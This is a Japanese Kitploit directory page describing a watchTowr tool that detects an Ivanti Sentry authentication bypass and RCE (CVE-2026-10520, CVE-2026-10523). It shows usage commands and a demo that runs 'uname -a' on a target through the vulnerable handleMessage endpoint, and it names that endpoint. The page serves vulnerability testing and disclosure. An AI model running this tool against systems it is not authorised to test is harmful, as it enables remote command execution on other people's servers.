Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RCE-CVE-2026-10520-CVE-2026-10523 — Ivanti Sentry の認証バイパスおよび RCE 脆弱性(CVE-2026-10520、CVE-2026-10523)の検出アーティファクト生成ツール。単一または複数のターゲットをスキャンし、コマンドを実行して、脆弱なホストを報告します。 | Kitploit
ツール/GitHubGitHub/imbas007/rce-cve-2026-10520-cve-2026-10523
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubimbas007/rce-cve-2026-10520-cve-2026-10523

RCE-CVE-2026-10520-CVE-2026-10523

Ivanti Sentry の認証バイパスおよび RCE 脆弱性(CVE-2026-10520、CVE-2026-10523)の検出アーティファクト生成ツール。単一または複数のターゲットをスキャンし、コマンドを実行して、脆弱なホストを報告します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
14時間38分前未レビュー

CVE-2026-10520 および CVE-2026-10523

Ivanti Sentry 認証バイパスおよびリモートコード実行の検出アーティファクト生成ツール。

技術的な詳細については、ブログ記事 を参照してください。

動作デモ

root@kitploit:~
$ python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            

        CVE-2026-10523.py

        (*) Ivanti Sentry 認証バイパスおよびリモートコード実行の検出アーティファクト生成ツール

          - Sonny , watchTowr ([email protected])

        CVE: [CVE-2026-10520, CVE-2026-10523]

============================================================
ターゲット: https://127.0.0.1
コマンド: uname -a

[+] コマンド実行チェックを送信中: https://127.0.0.1/mics/api/v2/sentry/mics-config/handleMessage
[+] ターゲットは脆弱である可能性があります。

コマンド出力:
Linux 127.0.0.1 4.18.0-553.84.1.el8_10.x86_64 #1 SMP Mon Nov 17 12:53:24 PST 2025 x86_64 x86_64 x86_64 GNU/Linux

使用方法

単一ターゲット:

root@kitploit:~
python3 CVE-2026-10523.py --url https://127.0.0.1 --cmd "uname -a"

ファイルから複数ターゲット(1行に1つのURL、空行と # コメントは無視):

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "uname -a"

プロキシを使用:

root@kitploit:~
python3 CVE-2026-10523.py -l targets.txt --cmd "id" -p 127.0.0.1:8080

リストモードはすべてのターゲットをスキャンし、接続エラーがあっても続行し、最後に脆弱なホストのサマリーを出力します。

説明

この watchTowr 検出アーティファクト生成ツールは、Ivanti Sentry の認証バイパスおよびリモートコード実行の脆弱性 CVE-2026-10520、CVE-2026-10523 をチェックします。

修正情報および詳細は、Ivanti のアドバイザリに記載されています: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

クレジット:

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
ツールをダウンロード